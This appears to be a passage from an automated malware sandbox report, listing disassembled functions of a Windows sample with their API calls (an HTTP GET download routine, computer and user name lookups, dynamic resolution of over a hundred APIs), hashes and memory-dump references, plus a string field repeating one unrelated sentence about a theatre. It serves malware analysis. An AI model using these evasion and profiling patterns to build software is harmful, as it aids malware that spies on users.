                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 8c45c75d09ec8c4bb52f1431fda7c592df0bfe541867f2cc1736c965bdef59c1
                                • Instruction ID: 9722184ca12c9f16706bdafca3d6b03e64a3b7a920434c24d19247755c52178b
                                • Opcode Fuzzy Hash: 8c45c75d09ec8c4bb52f1431fda7c592df0bfe541867f2cc1736c965bdef59c1
                                • Instruction Fuzzy Hash: 3A414D277C168CFACE28F7B4A85ED9D7B515F42702F505060FD0262280DFB87BA45D19
                                Function 00C36280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                  • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                • StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                • HttpOpenRequestA.WININET(00000000,GET,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C36385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C363FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C3646D
                                • InternetCloseHandle.WININET(00000000), ref: 00C364EF
                                • InternetCloseHandle.WININET(00000000), ref: 00C364F9
                                • InternetCloseHandle.WININET(00000000), ref: 00C36503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                • Instruction ID: 04078953bf938df15bcc01f89e04dc2b4793425046c7aa88e5fee91e870fd282
                                • Opcode Fuzzy Hash: e17c6b8eb69b09c6911a61566ea69d84df5a40e244642518d16a8f94a42369bf
                                • Instruction Fuzzy Hash: 01717071A50218AFEB24DFA1CC49BEE7778FB44700F1081A8F5096B1D0DBB46A89DF51
                                Function 00C478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1275 c478e0-c47937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 c47942-c47945 1275->1276 1277 c47939-c4793e 1275->1277 1278 c47962-c47972 1276->1278 1277->1278
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                • Instruction ID: 035164f214b34f763c814380577159b0e81387c7b31a79c211f50a29fc37ad4d
                                • Opcode Fuzzy Hash: b8fc6050a05ddfacbd39295c479b285427aa6b25cb8e14374cf654fa9169c0ba
                                • Instruction Fuzzy Hash: E101A9B1A04204EFD704DF95DD49BAEBBB8F744B11F104269F955F3380D37459448BA2
                                Function 00C47850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                • Instruction ID: 9ce8ac900d02d2978bb934eb55fb7ecf49834642ff18445beec39de60eefcc94
                                • Opcode Fuzzy Hash: f37ab3fb3fe0f72e29707973ee45bed134290be008c6f19934a9397bdba227d6
                                • Instruction Fuzzy Hash: 9AF04FB1944208AFD714DF99DD4AFAEBBB8FB44711F10026AFA05A2680C77415448BA2
                                Function 00C31160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                • Instruction ID: fa1f65954886638f3372c828b1a3f412262ef9978e05604369d9d6423aecacd3
                                • Opcode Fuzzy Hash: 8bc4f901989d7842a381124e97f74fd39fb83aa62fe1b25d72a373bcce4185ad
                                • Instruction Fuzzy Hash: BCD05E7490030CDFCB04DFE1D8496EDBB78FB48312F040565DD0972340EA3054C6CAA6
                                Function 00C49C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 c49c10-c49c1a 634 c4a036-c4a0ca LoadLibraryA * 8 633->634 635 c49c20-c4a031 GetProcAddress * 43 633->635 636 c4a146-c4a14d 634->636 637 c4a0cc-c4a141 GetProcAddress * 5 634->637 635->634 638 c4a216-c4a21d 636->638 639 c4a153-c4a211 GetProcAddress * 8 636->639 637->636 640 c4a21f-c4a293 GetProcAddress * 5 638->640 641 c4a298-c4a29f 638->641 639->638 640->641 642 c4a2a5-c4a332 GetProcAddress * 6 641->642 643 c4a337-c4a33e 641->643 642->643 644 c4a344-c4a41a GetProcAddress * 9 643->644 645 c4a41f-c4a426 643->645 644->645 646 c4a4a2-c4a4a9 645->646 647 c4a428-c4a49d GetProcAddress * 5 645->647 648 c4a4dc-c4a4e3 646->648 649 c4a4ab-c4a4d7 GetProcAddress * 2 646->649 647->646 650 c4a515-c4a51c 648->650 651 c4a4e5-c4a510 GetProcAddress * 2 648->651 649->648 652 c4a612-c4a619 650->652 653 c4a522-c4a60d GetProcAddress * 10 650->653 651->650 654 c4a67d-c4a684 652->654 655 c4a61b-c4a678 GetProcAddress * 4 652->655 653->652 656 c4a686-c4a699 GetProcAddress 654->656 657 c4a69e-c4a6a5 654->657 655->654 656->657 658 c4a6a7-c4a703 GetProcAddress * 4 657->658 659 c4a708-c4a709 657->659 658->659
                                APIs
                                • GetProcAddress.KERNEL32(77190000,019E5308), ref: 00C49C2D
                                • GetProcAddress.KERNEL32(77190000,019E5268), ref: 00C49C45
                                • GetProcAddress.KERNEL32(77190000,019F9020), ref: 00C49C5E
                                • GetProcAddress.KERNEL32(77190000,019F9038), ref: 00C49C76
                                • GetProcAddress.KERNEL32(77190000,019F9050), ref: 00C49C8E
                                • GetProcAddress.KERNEL32(77190000,019FD0E0), ref: 00C49CA7
                                • GetProcAddress.KERNEL32(77190000,019EA848), ref: 00C49CBF
                                • GetProcAddress.KERNEL32(77190000,019FD0F8), ref: 00C49CD7
                                • GetProcAddress.KERNEL32(77190000,019FD248), ref: 00C49CF0
                                • GetProcAddress.KERNEL32(77190000,019FD068), ref: 00C49D08
                                • GetProcAddress.KERNEL32(77190000,019FD188), ref: 00C49D20
                                • GetProcAddress.KERNEL32(77190000,019E5328), ref: 00C49D39
                                • GetProcAddress.KERNEL32(77190000,019E51E8), ref: 00C49D51
                                • GetProcAddress.KERNEL32(77190000,019E5028), ref: 00C49D69
                                • GetProcAddress.KERNEL32(77190000,019E5348), ref: 00C49D82
                                • GetProcAddress.KERNEL32(77190000,019FD260), ref: 00C49D9A
                                • GetProcAddress.KERNEL32(77190000,019FD2A8), ref: 00C49DB2
                                • GetProcAddress.KERNEL32(77190000,019EA758), ref: 00C49DCB
                                • GetProcAddress.KERNEL32(77190000,019E4F88), ref: 00C49DE3
                                • GetProcAddress.KERNEL32(77190000,019FD098), ref: 00C49DFB
                                • GetProcAddress.KERNEL32(77190000,019FD2D8), ref: 00C49E14
                                • GetProcAddress.KERNEL32(77190000,019FD050), ref: 00C49E2C
                                • GetProcAddress.KERNEL32(77190000,019FD2C0), ref: 00C49E44
                                • GetProcAddress.KERNEL32(77190000,019E50A8), ref: 00C49E5D
                                • GetProcAddress.KERNEL32(77190000,019FD0B0), ref: 00C49E75
                                • GetProcAddress.KERNEL32(77190000,019FD308), ref: 00C49E8D
                                • GetProcAddress.KERNEL32(77190000,019FD110), ref: 00C49EA6
                                • GetProcAddress.KERNEL32(77190000,019FD038), ref: 00C49EBE
                                • GetProcAddress.KERNEL32(77190000,019FD320), ref: 00C49ED6
                                • GetProcAddress.KERNEL32(77190000,019FD170), ref: 00C49EEF
                                • GetProcAddress.KERNEL32(77190000,019FD1A0), ref: 00C49F07
                                • GetProcAddress.KERNEL32(77190000,019FD080), ref: 00C49F1F
                                • GetProcAddress.KERNEL32(77190000,019FD2F0), ref: 00C49F38
                                • GetProcAddress.KERNEL32(77190000,019EFA78), ref: 00C49F50
                                • GetProcAddress.KERNEL32(77190000,019FD0C8), ref: 00C49F68
                                • GetProcAddress.KERNEL32(77190000,019FD128), ref: 00C49F81
                                • GetProcAddress.KERNEL32(77190000,019E50C8), ref: 00C49F99
                                • GetProcAddress.KERNEL32(77190000,019FD140), ref: 00C49FB1
                                • GetProcAddress.KERNEL32(77190000,019E5148), ref: 00C49FCA
                                • GetProcAddress.KERNEL32(77190000,019FD158), ref: 00C49FE2
                                • GetProcAddress.KERNEL32(77190000,019FD1B8), ref: 00C49FFA
                                • GetProcAddress.KERNEL32(77190000,019E5188), ref: 00C4A013
                                • GetProcAddress.KERNEL32(77190000,019E51A8), ref: 00C4A02B
                                • LoadLibraryA.KERNEL32(019FD1D0,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A03D
                                • LoadLibraryA.KERNEL32(019FD278,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A04E
                                • LoadLibraryA.KERNEL32(019FD1E8,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A060
                                • LoadLibraryA.KERNEL32(019FD200,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A072
                                • LoadLibraryA.KERNEL32(019FD290,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A083
                                • LoadLibraryA.KERNEL32(019FD218,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A095
                                • LoadLibraryA.KERNEL32(019FD230,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0A7
                                • LoadLibraryA.KERNEL32(019FD608,?,00C45CA3,00C50AEB,?,?,?,?,?,?,?,?,?,?,00C50AEA,00C50AE3), ref: 00C4A0B8
                                • GetProcAddress.KERNEL32(77040000,019E51C8), ref: 00C4A0DA
                                • GetProcAddress.KERNEL32(77040000,019FD590), ref: 00C4A0F2
                                • GetProcAddress.KERNEL32(77040000,019F8B28), ref: 00C4A10A
                                • GetProcAddress.KERNEL32(77040000,019FD500), ref: 00C4A123
                                • GetProcAddress.KERNEL32(77040000,019E5208), ref: 00C4A13B
                                • GetProcAddress.KERNEL32(73D20000,019EA528), ref: 00C4A160
                                • GetProcAddress.KERNEL32(73D20000,019E54C8), ref: 00C4A179
                                • GetProcAddress.KERNEL32(73D20000,019EA898), ref: 00C4A191
                                • GetProcAddress.KERNEL32(73D20000,019FD578), ref: 00C4A1A9
                                • GetProcAddress.KERNEL32(73D20000,019FD4B8), ref: 00C4A1C2
                                • GetProcAddress.KERNEL32(73D20000,019E5568), ref: 00C4A1DA
                                • GetProcAddress.KERNEL32(73D20000,019E53A8), ref: 00C4A1F2
                                • GetProcAddress.KERNEL32(73D20000,019FD4D0), ref: 00C4A20B
                                • GetProcAddress.KERNEL32(768D0000,019E5728), ref: 00C4A22C
                                • GetProcAddress.KERNEL32(768D0000,019E5388), ref: 00C4A244
                                • GetProcAddress.KERNEL32(768D0000,019FD3B0), ref: 00C4A25D
                                • GetProcAddress.KERNEL32(768D0000,019FD3C8), ref: 00C4A275
                                • GetProcAddress.KERNEL32(768D0000,019E54A8), ref: 00C4A28D
                                • GetProcAddress.KERNEL32(75790000,019EA550), ref: 00C4A2B3
                                • GetProcAddress.KERNEL32(75790000,019EA780), ref: 00C4A2CB
                                • GetProcAddress.KERNEL32(75790000,019FD338), ref: 00C4A2E3
                                • GetProcAddress.KERNEL32(75790000,019E55E8), ref: 00C4A2FC
                                • GetProcAddress.KERNEL32(75790000,019E5648), ref: 00C4A314
                                • GetProcAddress.KERNEL32(75790000,019EA5A0), ref: 00C4A32C
                                • GetProcAddress.KERNEL32(75A10000,019FD428), ref: 00C4A352
                                • GetProcAddress.KERNEL32(75A10000,019E5708), ref: 00C4A36A
                                • GetProcAddress.KERNEL32(75A10000,019F8B58), ref: 00C4A382
                                • GetProcAddress.KERNEL32(75A10000,019FD440), ref: 00C4A39B
                                • GetProcAddress.KERNEL32(75A10000,019FD368), ref: 00C4A3B3
                                • GetProcAddress.KERNEL32(75A10000,019E53C8), ref: 00C4A3CB
                                • GetProcAddress.KERNEL32(75A10000,019E53E8), ref: 00C4A3E4
                                • GetProcAddress.KERNEL32(75A10000,019FD518), ref: 00C4A3FC
                                • GetProcAddress.KERNEL32(75A10000,019FD398), ref: 00C4A414
                                • GetProcAddress.KERNEL32(76850000,019E5488), ref: 00C4A436
                                • GetProcAddress.KERNEL32(76850000,019FD5A8), ref: 00C4A44E
                                • GetProcAddress.KERNEL32(76850000,019FD5F0), ref: 00C4A466
                                • GetProcAddress.KERNEL32(76850000,019FD3F8), ref: 00C4A47F
                                • GetProcAddress.KERNEL32(76850000,019FD620), ref: 00C4A497
                                • GetProcAddress.KERNEL32(75690000,019E5668), ref: 00C4A4B8
                                • GetProcAddress.KERNEL32(75690000,019E5628), ref: 00C4A4D1
                                • GetProcAddress.KERNEL32(769C0000,019E5408), ref: 00C4A4F2
                                • GetProcAddress.KERNEL32(769C0000,019FD5C0), ref: 00C4A50A
                                • GetProcAddress.KERNEL32(6F8C0000,019E5428), ref: 00C4A530
                                • GetProcAddress.KERNEL32(6F8C0000,019E54E8), ref: 00C4A548
                                • GetProcAddress.KERNEL32(6F8C0000,019E56C8), ref: 00C4A560
                                • GetProcAddress.KERNEL32(6F8C0000,019FD410), ref: 00C4A579
                                • GetProcAddress.KERNEL32(6F8C0000,019E5448), ref: 00C4A591
                                • GetProcAddress.KERNEL32(6F8C0000,019E5468), ref: 00C4A5A9
                                • GetProcAddress.KERNEL32(6F8C0000,019E5508), ref: 00C4A5C2
                                • GetProcAddress.KERNEL32(6F8C0000,019E5688), ref: 00C4A5DA
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00C4A5F1
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00C4A607
                                • GetProcAddress.KERNEL32(75D90000,019FD4E8), ref: 00C4A629
                                • GetProcAddress.KERNEL32(75D90000,019F8C48), ref: 00C4A641
                                • GetProcAddress.KERNEL32(75D90000,019FD350), ref: 00C4A659
                                • GetProcAddress.KERNEL32(75D90000,019FD380), ref: 00C4A672
                                • GetProcAddress.KERNEL32(76470000,019E5528), ref: 00C4A693
                                • GetProcAddress.KERNEL32(70210000,019FD470), ref: 00C4A6B4
                                • GetProcAddress.KERNEL32(70210000,019E56A8), ref: 00C4A6CD
                                • GetProcAddress.KERNEL32(70210000,019FD5D8), ref: 00C4A6E5
                                • GetProcAddress.KERNEL32(70210000,019FD4A0), ref: 00C4A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
